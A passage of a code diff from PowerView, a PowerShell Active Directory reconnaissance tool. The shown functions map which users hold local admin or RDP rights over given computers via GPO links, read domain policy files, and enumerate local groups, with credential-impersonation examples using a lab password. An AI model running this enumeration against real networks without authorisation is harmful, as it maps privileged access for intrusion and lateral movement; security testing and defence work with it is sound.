-ComputerName WINDOWS3.testlab.local - [String] - $GroupName, +Finds users who have local admin rights over WINDOWS3 through GPO correlation. - [String] - $Domain, +.EXAMPLE - [String] - $DomainController, +Get-DomainGPOComputerLocalGroupMapping -Domain dev.testlab.local -ComputerName WINDOWS4.dev.testlab.local -LocalGroup RDP - [String] - $LocalGroup = 'Administrators', - - [Switch] - $UsePSDrive, +Finds users who have RDP rights over WINDOWS4 through GPO correlation. - [ValidateRange(1,10000)] - [Int] - $PageSize = 200 - ) +.EXAMPLE - if($UserName) { - # if a group name is specified, get that user object so we can extract the target SID - $User = Get-NetUser -UserName $UserName -Domain $Domain -DomainController $DomainController -PageSize $PageSize | Select-Object -First 1 - $UserSid = $User.objectsid +$SecPassword = ConvertTo-SecureString 'Password123!' -AsPlainText -Force +$Cred = New-Object System.Management.Automation.PSCredential('TESTLAB\dfm.a', $SecPassword) +Get-DomainGPOComputerLocalGroupMapping -Credential $Cred -ComputerIdentity SQL.testlab.local - if(-not $UserSid) { - Throw "User '$UserName' not found!" - } +.OUTPUTS - $TargetSIDs = @($UserSid) - $ObjectSamAccountName = $User.samaccountname - $TargetObject = $UserSid - } - elseif($GroupName) { - # if a group name is specified, get that group object so we can extract the target SID - $Group = Get-NetGroup -GroupName $GroupName -Domain $Domain -DomainController $DomainController -FullData -PageSize $PageSize | Select-Object -First 1 - $GroupSid = $Group.objectsid +PowerView.GGPOComputerLocalGroupMember +#> - if(-not $GroupSid) { - Throw "Group '$GroupName' not found!" - } + [Diagnostics.CodeAnalysis.SuppressMessageAttribute('PSShouldProcess', '')] + [OutputType('PowerView.GGPOComputerLocalGroupMember')] + [CmdletBinding(DefaultParameterSetName = 'ComputerIdentity')] + Param( + [Parameter(Position = 0, ParameterSetName = 'ComputerIdentity', Mandatory = $True, ValueFromPipeline = $True, ValueFromPipelineByPropertyName = $True)] + [Alias('ComputerName', 'Computer', 'DistinguishedName', 'SamAccountName', 'Name')] + [String] + $ComputerIdentity, - $TargetSIDs = @($GroupSid) - $ObjectSamAccountName = $Group.samaccountname - $TargetObject = $GroupSid - } - else { - $TargetSIDs = @('*') - } + [Parameter(Mandatory = $True, ParameterSetName = 'OUIdentity')] + [Alias('OU')] + [String] + $OUIdentity, - # figure out what the SID is of the target local group we're checking for membership in - if($LocalGroup -like "*Admin*") { - $TargetLocalSID = 'S-1-5-32-544' - } - elseif ( ($LocalGroup -like "*RDP*") -or ($LocalGroup -like "*Remote*") ) { - $TargetLocalSID = 'S-1-5-32-555' - } - elseif ($LocalGroup -like "S-1-5-*") { - $TargetLocalSID = $LocalGroup - } - else { - throw "LocalGroup must be 'Administrators', 'RDP', or a 'S-1-5-X' SID format." - } + [String] + [ValidateSet('Administrators', 'S-1-5-32-544', 'RDP', 'Remote Desktop Users', 'S-1-5-32-555')] + $LocalGroup = 'Administrators', - # if we're not listing all relationships, use the tokenGroups approach from Get-NetGroup to - # get all effective security SIDs this object is a part of - if($TargetSIDs[0] -and ($TargetSIDs[0] -ne '*')) { - $TargetSIDs += Get-NetGroup -Domain $Domain -DomainController $DomainController -PageSize $PageSize -UserName $ObjectSamAccountName -RawSids - } + [ValidateNotNullOrEmpty()] + [String] + $Domain, - if(-not $TargetSIDs) { - throw "No effective target SIDs!" - } + [ValidateNotNullOrEmpty()] + [Alias('ADSPath')] + [String] + $SearchBase, - Write-Verbose "TargetLocalSID: $TargetLocalSID" - Write-Verbose "Effective target SIDs: $TargetSIDs" + [ValidateNotNullOrEmpty()] + [Alias('DomainController')] + [String] + $Server, - $GPOGroupArgs = @{ - 'Domain' = $Domain - 'DomainController' = $DomainController - 'UsePSDrive' = $UsePSDrive - 'ResolveMemberSIDs' = $True - 'PageSize' = $PageSize - } + [ValidateSet('Base', 'OneLevel', 'Subtree')] + [String] + $SearchScope = 'Subtree', - # enumerate all GPO group mappings for the target domain that involve our target SID set - $GPOgroups = Get-NetGPOGroup @GPOGroupArgs | ForEach-Object { + [ValidateRange(1, 10000)] + [Int] + $ResultPageSize = 200, - $GPOgroup = $_ + [ValidateRange(1, 10000)] + [Int] + $ServerTimeLimit, - # if the locally set group is what we're looking for, check the GroupMembers ('members') - # for our target SID - if($GPOgroup.GroupSID -match $TargetLocalSID) { - $GPOgroup.GroupMembers | Where-Object {$_} | ForEach-Object { - if ( ($TargetSIDs[0] -eq '*') -or ($TargetSIDs -Contains $_) ) { - $GPOgroup - } - } - } - # if the group is a 'memberof' the group we're looking for, check GroupSID against the targt SIDs - if( ($GPOgroup.GroupMemberOf -contains $TargetLocalSID) ) { - if( ($TargetSIDs[0] -eq '*') -or ($TargetSIDs -Contains $GPOgroup.GroupSID) ) { - $GPOgroup - } - } - } | Sort-Object -Property GPOName -Unique + [Switch] + $Tombstone, - $GPOgroups | ForEach-Object { + [Management.Automation.PSCredential] + [Management.Automation.CredentialAttribute()] + $Credential = [Management.Automation.PSCredential]::Empty + ) - $GPOname = $_.GPODisplayName - $GPOguid = $_.GPOName - $GPOPath = $_.GPOPath - $GPOType = $_.GPOType - if($_.GroupMembers) { - $GPOMembers = $_.GroupMembers - } - else { - $GPOMembers = $_.GroupSID - } - - $Filters = $_.Filters + BEGIN { + $CommonArguments = @{} + if ($PSBoundParameters['Domain']) { $CommonArguments['Domain'] = $Domain } + if ($PSBoundParameters['Server']) { $CommonArguments['Server'] = $Server } + if ($PSBoundParameters['SearchScope']) { $CommonArguments['SearchScope'] = $SearchScope } + if ($PSBoundParameters['ResultPageSize']) { $CommonArguments['ResultPageSize'] = $ResultPageSize } + if ($PSBoundParameters['ServerTimeLimit']) { $CommonArguments['ServerTimeLimit'] = $ServerTimeLimit } + if ($PSBoundParameters['Tombstone']) { $CommonArguments['Tombstone'] = $Tombstone } + if ($PSBoundParameters['Credential']) { $CommonArguments['Credential'] = $Credential } + } - if(-not $TargetObject) { - # if the * wildcard was used, set the ObjectDistName as the GPO member SID set - # so all relationship mappings are output - $TargetObjectSIDs = $GPOMembers - } - else { - $TargetObjectSIDs = $TargetObject - } + PROCESS { + if ($PSBoundParameters['ComputerIdentity']) { + $Computers = Get-DomainComputer @CommonArguments -Identity $ComputerIdentity -Properties 'distinguishedname,dnshostname' - # find any OUs that have this GUID applied and then retrieve any computers from the OU - Get-NetOU -Domain $Domain -DomainController $DomainController -GUID $GPOguid -FullData -PageSize $PageSize | ForEach-Object { - if($Filters) { - # filter for computer name/org unit if a filter is specified - # TODO: handle other filters (i.e. OU filters?) again, I hate you GPP... - $OUComputers = Get-NetComputer -Domain $Domain -DomainController $DomainController -Credential $Credential -ADSpath $_.ADSpath -FullData -PageSize $PageSize | Where-Object { - $_.adspath -match ($Filters.Value) - } | ForEach-Object { $_.dnshostname } - } - else { - $OUComputers = Get-NetComputer -Domain $Domain -DomainController $DomainController -Credential $Credential -ADSpath $_.ADSpath -PageSize $PageSize + if (-not $Computers) { + throw "[Get-DomainGPOComputerLocalGroupMapping] Computer $ComputerIdentity not found. Try a fully qualified host name." } - if($OUComputers) { - if($OUComputers -isnot [System.Array]) {$OUComputers = @($OUComputers)} + ForEach ($Computer in $Computers) { - ForEach ($TargetSid in $TargetObjectSIDs) { - $Object = Get-ADObject -SID $TargetSid -Domain $Domain -DomainController $DomainController -Credential $Credential -PageSize $PageSize - - $IsGroup = @('268435456','268435457','536870912','536870913') -contains $Object.samaccounttype + $GPOGuids = @() - $GPOLocation = New-Object PSObject - $GPOLocation | Add-Member Noteproperty 'ObjectName' $Object.samaccountname - $GPOLocation | Add-Member Noteproperty 'ObjectDN' $Object.distinguishedname - $GPOLocation | Add-Member Noteproperty 'ObjectSID' $Object.objectsid - $GPOLocation | Add-Member Noteproperty 'Domain' $Domain - $GPOLocation | Add-Member Noteproperty 'IsGroup' $IsGroup - $GPOLocation | Add-Member Noteproperty 'GPODisplayName' $GPOname - $GPOLocation | Add-Member Noteproperty 'GPOGuid' $GPOGuid - $GPOLocation | Add-Member Noteproperty 'GPOPath' $GPOPath - $GPOLocation | Add-Member Noteproperty 'GPOType' $GPOType - $GPOLocation | Add-Member Noteproperty 'ContainerName' $_.distinguishedname - $GPOLocation | Add-Member Noteproperty 'ComputerName' $OUComputers - $GPOLocation.PSObject.TypeNames.Add('PowerView.GPOLocalGroup') - $GPOLocation + # extract any GPOs linked to this computer's OU through gpLink + $DN = $Computer.distinguishedname + $OUIndex = $DN.IndexOf('OU=') + if ($OUIndex -gt 0) { + $OUName = $DN.SubString($OUIndex) + } + if ($OUName) { + $GPOGuids += Get-DomainOU @CommonArguments -SearchBase $OUName -LDAPFilter '(gplink=*)' | ForEach-Object { + Select-String -InputObject $_.gplink -Pattern '(\{){0,1}[0-9a-fA-F]{8}\-[0-9a-fA-F]{4}\-[0-9a-fA-F]{4}\-[0-9a-fA-F]{4}\-[0-9a-fA-F]{12}(\}){0,1}' -AllMatches | ForEach-Object {$_.Matches | Select-Object -ExpandProperty Value } + } } - } - } - # find any sites that have this GUID applied - Get-NetSite -Domain $Domain -DomainController $DomainController -GUID $GPOguid -PageSize $PageSize -FullData | ForEach-Object { + # extract any GPOs linked to this computer's site through gpLink + Write-Verbose "Enumerating the sitename for: $($Computer.dnshostname)" + $ComputerSite = (Get-NetComputerSiteName -ComputerName $Computer.dnshostname).SiteName + if ($ComputerSite -and ($ComputerSite -notmatch 'Error')) { + $GPOGuids += Get-DomainSite @CommonArguments -Identity $ComputerSite -LDAPFilter '(gplink=*)' | ForEach-Object { + Select-String -InputObject $_.gplink -Pattern '(\{){0,1}[0-9a-fA-F]{8}\-[0-9a-fA-F]{4}\-[0-9a-fA-F]{4}\-[0-9a-fA-F]{4}\-[0-9a-fA-F]{12}(\}){0,1}' -AllMatches | ForEach-Object {$_.Matches | Select-Object -ExpandProperty Value } + } + } - ForEach ($TargetSid in $TargetObjectSIDs) { - $Object = Get-ADObject -SID $TargetSid -Domain $Domain -DomainController $DomainController -Credential $Credential -PageSize $PageSize + # process any GPO local group settings from the GPO GUID set + $GPOGuids | Get-DomainGPOLocalGroup @CommonArguments | Sort-Object -Property GPOName -Unique | ForEach-Object { + $GPOGroup = $_ - $IsGroup = @('268435456','268435457','536870912','536870913') -contains $Object.samaccounttype + if($GPOGroup.GroupMembers) { + $GPOMembers = $GPOGroup.GroupMembers + } + else { + $GPOMembers = $GPOGroup.GroupSID + } - $AppliedSite = New-Object PSObject - $AppliedSite | Add-Member Noteproperty 'ObjectName' $Object.samaccountname - $AppliedSite | Add-Member Noteproperty 'ObjectDN' $Object.distinguishedname - $AppliedSite | Add-Member Noteproperty 'ObjectSID' $Object.objectsid - $AppliedSite | Add-Member Noteproperty 'IsGroup' $IsGroup - $AppliedSite | Add-Member Noteproperty 'Domain' $Domain - $AppliedSite | Add-Member Noteproperty 'GPODisplayName' $GPOname - $AppliedSite | Add-Member Noteproperty 'GPOGuid' $GPOGuid - $AppliedSite | Add-Member Noteproperty 'GPOPath' $GPOPath - $AppliedSite | Add-Member Noteproperty 'GPOType' $GPOType - $AppliedSite | Add-Member Noteproperty 'ContainerName' $_.distinguishedname - $AppliedSite | Add-Member Noteproperty 'ComputerName' $_.siteobjectbl - $AppliedSite.PSObject.TypeNames.Add('PowerView.GPOLocalGroup') - $AppliedSite + $GPOMembers | ForEach-Object { + $Object = Get-DomainObject @CommonArguments -Identity $_ + $IsGroup = @('268435456','268435457','536870912','536870913') -contains $Object.samaccounttype + + $GPOComputerLocalGroupMember = New-Object PSObject + $GPOComputerLocalGroupMember | Add-Member Noteproperty 'ComputerName' $Computer.dnshostname + $GPOComputerLocalGroupMember | Add-Member Noteproperty 'ObjectName' $Object.samaccountname + $GPOComputerLocalGroupMember | Add-Member Noteproperty 'ObjectDN' $Object.distinguishedname + $GPOComputerLocalGroupMember | Add-Member Noteproperty 'ObjectSID' $_ + $GPOComputerLocalGroupMember | Add-Member Noteproperty 'IsGroup' $IsGroup + $GPOComputerLocalGroupMember | Add-Member Noteproperty 'GPODisplayName' $GPOGroup.GPODisplayName + $GPOComputerLocalGroupMember | Add-Member Noteproperty 'GPOGuid' $GPOGroup.GPOName + $GPOComputerLocalGroupMember | Add-Member Noteproperty 'GPOPath' $GPOGroup.GPOPath + $GPOComputerLocalGroupMember | Add-Member Noteproperty 'GPOType' $GPOGroup.GPOType + $GPOComputerLocalGroupMember.PSObject.TypeNames.Add('PowerView.GPOComputerLocalGroupMember') + $GPOComputerLocalGroupMember + } + } } } } } -function Find-GPOComputerAdmin { +function Get-DomainPolicyData { <# - .SYNOPSIS +.SYNOPSIS + +Returns the default domain policy or the domain controller policy for the current +domain or a specified domain/domain controller. - Takes a computer (or GPO) object and determines what users/groups are in the specified - local group for the machine. +Author: Will Schroeder (@harmj0y) +License: BSD 3-Clause +Required Dependencies: Get-DomainGPO, Get-GptTmpl, ConvertFrom-SID - Author: @harmj0y - License: BSD 3-Clause - Required Dependencies: Get-NetComputer, Get-SiteName, Get-NetSite, Get-NetGPOGroup, Get-ADObject, Get-NetGroupMember, Convert-SidToName - Optional Dependencies: None +.DESCRIPTION - .DESCRIPTION - - If a -ComputerName is specified, retrieve the complete computer object, attempt to - determine the OU the computer is a part of. Then resolve the computer's site name with - Get-SiteName and retrieve all sites object Get-NetSite. For those results, attempt to - enumerate all linked GPOs and associated local group settings with Get-NetGPOGroup. For - each resulting GPO group, resolve the resulting user/group name to a full AD object and - return the results. This will return the domain objects that are members of the specified - -LocalGroup for the given computer. +Returns the default domain policy or the domain controller policy for the current +domain or a specified domain/domain controller using Get-DomainGPO. - Inverse of Find-GPOLocation. +.PARAMETER Domain - .PARAMETER ComputerName +The domain to query for default policies, defaults to the current domain. - The computer to determine local administrative access to. +.PARAMETER Policy - .PARAMETER OUName +Extract 'Domain', 'DC' (domain controller) policies, or 'All' for all policies. +Otherwise queries for the particular GPO name or GUID. - OU name to determine who has local adminisrtative acess to computers - within it. +.PARAMETER Server - .PARAMETER Domain +Specifies an Active Directory server (domain controller) to bind to. - Optional domain the computer/OU exists in, defaults to the current domain. +.PARAMETER ServerTimeLimit - .PARAMETER DomainController +Specifies the maximum amount of time the server spends searching. Default of 120 seconds. - Domain controller to reflect LDAP queries through. +.PARAMETER Credential - .PARAMETER Recurse +A [Management.Automation.PSCredential] object of alternate credentials +for connection to the target domain. - Switch. If a returned member is a group, recurse and get all members. +.EXAMPLE - .PARAMETER LocalGroup +Get-DomainPolicyData - The local group to check access against. - Can be "Administrators" (S-1-5-32-544), "RDP/Remote Desktop Users" (S-1-5-32-555), - or a custom local SID. - Defaults to local 'Administrators'. +Returns the default domain policy for the current domain. - .PARAMETER UsePSDrive +.EXAMPLE - Switch. Mount any found policy files with temporary PSDrives. +Get-DomainPolicyData -Domain dev.testlab.local - .PARAMETER PageSize +Returns the default domain policy for the dev.testlab.local domain. - The PageSize to set for the LDAP searcher object. +.EXAMPLE - .EXAMPLE +Get-DomainGPO | Get-DomainPolicy - PS C:\> Find-GPOComputerAdmin -ComputerName WINDOWS3.dev.testlab.local - - Finds users who have local admin rights over WINDOWS3 through GPO correlation. +Parses any GptTmpl.infs found for any policies in the current domain. - .EXAMPLE +.EXAMPLE - PS C:\> Find-GPOComputerAdmin -ComputerName WINDOWS3.dev.testlab.local -LocalGroup RDP - - Finds users who have RDP rights over WINDOWS3 through GPO correlation. +Get-DomainPolicyData -Policy DC -Domain dev.testlab.local + +Returns the policy for the dev.testlab.local domain controller. + +.EXAMPLE + +$SecPassword = ConvertTo-SecureString 'Password123!' -AsPlainText -Force +$Cred = New-Object System.Management.Automation.PSCredential('TESTLAB\dfm.a', $SecPassword) +Get-DomainPolicyData -Credential $Cred + +.OUTPUTS + +Hashtable + +Ouputs a hashtable representing the parsed GptTmpl.inf file. #> + [Diagnostics.CodeAnalysis.SuppressMessageAttribute('PSShouldProcess', '')] + [OutputType([Hashtable])] [CmdletBinding()] - Param ( - [Parameter(ValueFromPipeline=$True)] - [String] - $ComputerName, - + Param( + [Parameter(Position = 0, ValueFromPipeline = $True, ValueFromPipelineByPropertyName = $True)] + [Alias('Source', 'Name')] [String] - $OUName, + $Policy = 'Domain', + [ValidateNotNullOrEmpty()] [String] $Domain, + [ValidateNotNullOrEmpty()] + [Alias('DomainController')] [String] - $DomainController, - - [Switch] - $Recurse, - - [String] - $LocalGroup = 'Administrators', + $Server, - [Switch] - $UsePSDrive, - - [ValidateRange(1,10000)] + [ValidateRange(1, 10000)] [Int] - $PageSize = 200 - ) - - process { - - if(!$ComputerName -and !$OUName) { - Throw "-ComputerName or -OUName must be provided" - } + $ServerTimeLimit, - $GPOGroups = @() - - if($ComputerName) { - $Computers = Get-NetComputer -ComputerName $ComputerName -Domain $Domain -DomainController $DomainController -FullData -PageSize $PageSize + [Management.Automation.PSCredential] + [Management.Automation.CredentialAttribute()] + $Credential = [Management.Automation.PSCredential]::Empty + ) - if(!$Computers) { - throw "Computer $ComputerName in domain '$Domain' not found! Try a fully qualified host name" - } - - $TargetOUs = @() - ForEach($Computer in $Computers) { - # extract all OUs a computer is a part of - $DN = $Computer.distinguishedname + BEGIN { + $SearcherArguments = @{} + if ($PSBoundParameters['Server']) { $SearcherArguments['Server'] = $Server } + if ($PSBoundParameters['ServerTimeLimit']) { $SearcherArguments['ServerTimeLimit'] = $ServerTimeLimit } + if ($PSBoundParameters['Credential']) { $SearcherArguments['Credential'] = $Credential } - $TargetOUs += $DN.split(",") | ForEach-Object { - if($_.startswith("OU=")) { - $DN.substring($DN.indexof($_)) - } - } - } + $ConvertArguments = @{} + if ($PSBoundParameters['Server']) { $ConvertArguments['Server'] = $Server } + if ($PSBoundParameters['Credential']) { $ConvertArguments['Credential'] = $Credential } + } - # enumerate any linked GPOs for the computer's site - $ComputerSite = (Get-SiteName -ComputerName $ComputerName).SiteName - if($ComputerSite -and ($ComputerSite -notlike 'Error*')) { - $GPOGroups += Get-NetSite -SiteName $ComputerSite -FullData | ForEach-Object { - if($_.gplink) { - $_.gplink.split("][") | ForEach-Object { - if ($_.startswith("LDAP")) { - $_.split(";")[0] - } - } - } - } | ForEach-Object { - $GPOGroupArgs = @{ - 'Domain' = $Domain - 'DomainController' = $DomainController - 'ResolveMemberSIDs' = $True - 'UsePSDrive' = $UsePSDrive - 'PageSize' = $PageSize - } + PROCESS { + if ($PSBoundParameters['Domain']) { + $SearcherArguments['Domain'] = $Domain + $ConvertArguments['Domain'] = $Domain + } - # for each GPO link, get any locally set user/group SIDs - Get-NetGPOGroup @GPOGroupArgs - } - } + if ($Policy -eq 'All') { + $SearcherArguments['Identity'] = '*' + } + elseif ($Policy -eq 'Domain') { + $SearcherArguments['Identity'] = '{31B2F340-016D-11D2-945F-00C04FB984F9}' + } + elseif (($Policy -eq 'DomainController') -or ($Policy -eq 'DC')) { + $SearcherArguments['Identity'] = '{6AC1786C-016F-11D2-945F-00C04FB984F9}' } else { - $TargetOUs = @($OUName) + $SearcherArguments['Identity'] = $Policy } - Write-Verbose "Target OUs: $TargetOUs" - - $TargetOUs | Where-Object {$_} | ForEach-Object { + $GPOResults = Get-DomainGPO @SearcherArguments - $GPOLinks = Get-NetOU -Domain $Domain -DomainController $DomainController -ADSpath $_ -FullData -PageSize $PageSize | ForEach-Object { - # and then get any GPO links - if($_.gplink) { - $_.gplink.split("][") | ForEach-Object { - if ($_.startswith("LDAP")) { - $_.split(";")[0] - } - } - } - } + ForEach ($GPO in $GPOResults) { + # grab the GptTmpl.inf file and parse it + $GptTmplPath = $GPO.gpcfilesyspath + "\MACHINE\Microsoft\Windows NT\SecEdit\GptTmpl.inf" - $GPOGroupArgs = @{ - 'Domain' = $Domain - 'DomainController' = $DomainController - 'UsePSDrive' = $UsePSDrive - 'ResolveMemberSIDs' = $True - 'PageSize' = $PageSize + $ParseArgs = @{ + 'GptTmplPath' = $GptTmplPath + 'OutputObject' = $True } + if ($PSBoundParameters['Credential']) { $ParseArgs['Credential'] = $Credential } - # extract GPO groups that are set through any gPlink for this OU - $GPOGroups += Get-NetGPOGroup @GPOGroupArgs | ForEach-Object { - ForEach($GPOLink in $GPOLinks) { - $Name = $_.GPOName - if($GPOLink -like "*$Name*") { - $_ - } - } + # parse the GptTmpl.inf + Get-GptTmpl @ParseArgs | ForEach-Object { + $_ | Add-Member Noteproperty 'GPOName' $GPO.name + $_ | Add-Member Noteproperty 'GPODisplayName' $GPO.displayname + $_ } } + } +} - # for each found GPO group, resolve the SIDs of the members - $GPOgroups | Sort-Object -Property GPOName -Unique | ForEach-Object { - $GPOGroup = $_ - - if($GPOGroup.GroupMembers) { - $GPOMembers = $GPOGroup.GroupMembers - } - else { - $GPOMembers = $GPOGroup.GroupSID - } - - $GPOMembers | ForEach-Object { - # resolve this SID to a domain object - $Object = Get-ADObject -Domain $Domain -DomainController $DomainController -PageSize $PageSize -SID $_ - - $IsGroup = @('268435456','268435457','536870912','536870913') -contains $Object.samaccounttype - - $GPOComputerAdmin = New-Object PSObject - $GPOComputerAdmin | Add-Member Noteproperty 'ComputerName' $ComputerName - $GPOComputerAdmin | Add-Member Noteproperty 'ObjectName' $Object.samaccountname - $GPOComputerAdmin | Add-Member Noteproperty 'ObjectDN' $Object.distinguishedname - $GPOComputerAdmin | Add-Member Noteproperty 'ObjectSID' $_ - $GPOComputerAdmin | Add-Member Noteproperty 'IsGroup' $IsGroup - $GPOComputerAdmin | Add-Member Noteproperty 'GPODisplayName' $GPOGroup.GPODisplayName - $GPOComputerAdmin | Add-Member Noteproperty 'GPOGuid' $GPOGroup.GPOName - $GPOComputerAdmin | Add-Member Noteproperty 'GPOPath' $GPOGroup.GPOPath - $GPOComputerAdmin | Add-Member Noteproperty 'GPOType' $GPOGroup.GPOType - $GPOComputerAdmin - - # if we're recursing and the current result object is a group - if($Recurse -and $GPOComputerAdmin.isGroup) { - - Get-NetGroupMember -Domain $Domain -DomainController $DomainController -SID $_ -FullData -Recurse -PageSize $PageSize | ForEach-Object { - $MemberDN = $_.distinguishedName +######################################################## +# +# Functions that enumerate a single host, either through +# WinNT, WMI, remote registry, or API calls +# (with PSReflect). +# +######################################################## - # extract the FQDN from the Distinguished Name - $MemberDomain = $MemberDN.subString($MemberDN.IndexOf("DC=")) -replace 'DC=','' -replace ',','.' +function Get-NetLocalGroup { +<# +.SYNOPSIS - $MemberIsGroup = @('268435456','268435457','536870912','536870913') -contains $_.samaccounttype +Enumerates the local groups on the local (or remote) machine. - if ($_.samAccountName) { - # forest users have the samAccountName set - $MemberName = $_.samAccountName - } - else { - # external trust users have a SID, so convert it - try { - $MemberName = Convert-SidToName $_.cn - } - catch { - # if there's a problem contacting the domain to resolve the SID - $MemberName = $_.cn - } - } +Author: Will Schroeder (@harmj0y) +License: BSD 3-Clause +Required Dependencies: PSReflect - $GPOComputerAdmin = New-Object PSObject - $GPOComputerAdmin | Add-Member Noteproperty 'ComputerName' $ComputerName - $GPOComputerAdmin | Add-Member Noteproperty 'ObjectName' $MemberName - $GPOComputerAdmin | Add-Member Noteproperty 'ObjectDN' $MemberDN - $GPOComputerAdmin | Add-Member Noteproperty 'ObjectSID' $_.objectsid - $GPOComputerAdmin | Add-Member Noteproperty 'IsGroup' $MemberIsGrou - $GPOComputerAdmin | Add-Member Noteproperty 'GPODisplayName' $GPOGroup.GPODisplayName - $GPOComputerAdmin | Add-Member Noteproperty 'GPOGuid' $GPOGroup.GPOName - $GPOComputerAdmin | Add-Member Noteproperty 'GPOPath' $GPOGroup.GPOPath - $GPOComputerAdmin | Add-Member Noteproperty 'GPOType' $GPOTypep - $GPOComputerAdmin - } - } - } - } - } -} +.DESCRIPTION +This function will enumerate the names and descriptions for the +local groups on the current, or remote, machine. By default, the Win32 API +call NetLocalGroupEnum will be used (for speed). Specifying "-Method WinNT" +causes the WinNT service provider to be used instead, which returns group +SIDs along with the group names and descriptions/comments. -function Get-DomainPolicy { -<# - .SYNOPSIS +.PARAMETER ComputerName + +Specifies the hostname to query for sessions (also accepts IP addresses). +Defaults to the localhost. - Returns the default domain or DC policy for a given - domain or domain controller. +.PARAMETER Method - Thanks Sean Metacalf (@pyrotek3) for the idea and guidance. +The collection method to use, defaults to 'API', also accepts 'WinNT'. - .PARAMETER Source +.PARAMETER Credential - Extract Domain or DC (domain controller) policies. +A [Management.Automation.PSCredential] object of alternate credentials +for connection to a remote machine. Only applicable with "-Method WinNT". - .PARAMETER Domain +.EXAMPLE - The domain to query for default policies, defaults to the current domain. +Get-NetLocalGroup - .PARAMETER DomainController +ComputerName GroupName Comment +------------ --------- ------- +WINDOWS1 Administrators Administrators have comple... +WINDOWS1 Backup Operators Backup Operators can overr... +WINDOWS1 Cryptographic Operators Members are authorized to ... +... - Domain controller to reflect LDAP queries through. +.EXAMPLE - .PARAMETER ResolveSids +Get-NetLocalGroup -Method Winnt - Switch. Resolve Sids from a DC policy to object names. +ComputerName GroupName GroupSID Comment +------------ --------- -------- ------- +WINDOWS1 Administrators S-1-5-32-544 Administrators hav... +WINDOWS1 Backup Operators S-1-5-32-551 Backup Operators c... +WINDOWS1 Cryptographic Opera... S-1-5-32-569 Members are author... +... - .PARAMETER UsePSDrive +.EXAMPLE - Switch. Mount any found policy files with temporary PSDrives. +Get-NetLocalGroup -ComputerName primary.testlab.local - .EXAMPLE +ComputerName GroupName Comment +------------ --------- ------- +primary.testlab.local Administrators Administrators have comple... +primary.testlab.local Users Users are prevented from m... +primary.testlab.local Guests Guests have the same acces... +primary.testlab.local Print Operators Members can administer dom... +primary.testlab.local Backup Operators Backup Operators can overr... - PS C:\> Get-DomainPolicy +.OUTPUTS - Returns the domain policy for the current domain. +PowerView.LocalGroup.API - .EXAMPLE +Custom PSObject with translated group property fields from API results. - PS C:\> Get-DomainPolicy -Source DC -DomainController MASTER.testlab.local +PowerView.LocalGroup.WinNT - Returns the policy for the MASTER.testlab.local domain controller. +Custom PSObject with translated group property fields from WinNT results. + +.LINK + +https://msdn.microsoft.com/en-us/library/windows/desktop/aa370440(v=vs.85).aspx #> + [Diagnostics.CodeAnalysis.SuppressMessageAttribute('PSShouldProcess', '')] + [OutputType('PowerView.LocalGroup.API')] + [OutputType('PowerView.LocalGroup.WinNT')] [CmdletBinding()] - Param ( - [String] - [ValidateSet("Domain","DC")] - $Source ="Domain", - - [String] - $Domain, + Param( + [Parameter(Position = 0, ValueFromPipeline = $True, ValueFromPipelineByPropertyName = $True)] + [Alias('HostName', 'dnshostname', 'name')] + [ValidateNotNullOrEmpty()] + [String[]] + $ComputerName = $Env:COMPUTERNAME, + [ValidateSet('API', 'WinNT')] + [Alias('CollectionMethod')] [String] - $DomainController, - - [Switch] - $ResolveSids, + $Method = 'API', - [Switch] - $UsePSDrive + [Management.Automation.PSCredential] + [Management.Automation.CredentialAttribute()] + $Credential = [Management.Automation.PSCredential]::Empty ) - if($Source -eq "Domain") { - # query the given domain for the default domain policy object - $GPO = Get-NetGPO -Domain $Domain -DomainController $DomainController -GPOname "{31B2F340-016D-11D2-945F-00C04FB984F9}" - - if($GPO) { - # grab the GptTmpl.inf file and parse it - $GptTmplPath = $GPO.gpcfilesyspath + "\MACHINE\Microsoft\Windows NT\SecEdit\GptTmpl.inf" - - $ParseArgs = @{ - 'GptTmplPath' = $GptTmplPath - 'UsePSDrive' = $UsePSDrive - } - - # parse the GptTmpl.inf - Get-GptTmpl @ParseArgs + BEGIN { + if ($PSBoundParameters['Credential']) { + $LogonToken = Invoke-UserImpersonation -Credential $Credential } - } - elseif($Source -eq "DC") { - # query the given domain/dc for the default domain controller policy object - $GPO = Get-NetGPO -Domain $Domain -DomainController $DomainController -GPOname "{6AC1786C-016F-11D2-945F-00C04FB984F9}" - if($GPO) { - # grab the GptTmpl.inf file and parse it - $GptTmplPath = $GPO.gpcfilesyspath + "\MACHINE\Microsoft\Windows NT\SecEdit\GptTmpl.inf" + PROCESS { + ForEach ($Computer in $ComputerName) { + if ($Method -eq 'API') { + # if we're using the Netapi32 NetLocalGroupEnum API call to get the local group information - $ParseArgs = @{ - 'GptTmplPath' = $GptTmplPath - 'UsePSDrive' = $UsePSDrive - } + # arguments for NetLocalGroupEnum + $QueryLevel = 1 + $PtrInfo = [IntPtr]::Zero + $EntriesRead = 0 + $TotalRead = 0 + $ResumeHandle = 0 - # parse the GptTmpl.inf - Get-GptTmpl @ParseArgs | ForEach-Object { - if($ResolveSids) { - # if we're resolving sids in PrivilegeRights to names - $Policy = New-Object PSObject - $_.psobject.properties | ForEach-Object { - if( $_.Name -eq 'PrivilegeRights') { + # get the local user information + $Result = $Netapi32::NetLocalGroupEnum($Computer, $QueryLevel, [ref]$PtrInfo, -1, [ref]$EntriesRead, [ref]$TotalRead, [ref]$ResumeHandle) - $PrivilegeRights = New-Object PSObject - # for every nested SID member of PrivilegeRights, try to unpack everything and resolve the SIDs as appropriate - $_.Value.psobject.properties | ForEach-Object { + # locate the offset of the initial intPtr + $Offset = $PtrInfo.ToInt64() - $Sids = $_.Value | ForEach-Object { - try { - if($_ -isnot [System.Array]) { - Convert-SidToName $_ - } - else { - $_ | ForEach-Object { Convert-SidToName $_ } - } - } - catch { - Write-Verbose "Error resolving SID : $_" - } - } + # 0 = success + if (($Result -eq 0) -and ($Offset -gt 0)) { - $PrivilegeRights | Add-Member Noteproperty $_.Name $Sids - } + # Work out how much to increment the pointer by finding out the size of the structure + $Increment = $LOCALGROUP_INFO_1::GetSize() - $Policy | Add-Member Noteproperty 'PrivilegeRights' $PrivilegeRights - } - else { - $Policy | Add-Member Noteproperty $_.Name $_.Value - } + # parse all the result structures + for ($i = 0; ($i -lt $EntriesRead); $i++) { + # create a new int ptr at the given offset and cast the pointer as our result structure + $NewIntPtr = New-Object System.Intptr -ArgumentList $Offset + $Info = $NewIntPtr -as $LOCALGROUP_INFO_1 + + $Offset = $NewIntPtr.ToInt64() + $Offset += $Increment + + $LocalGroup = New-Object 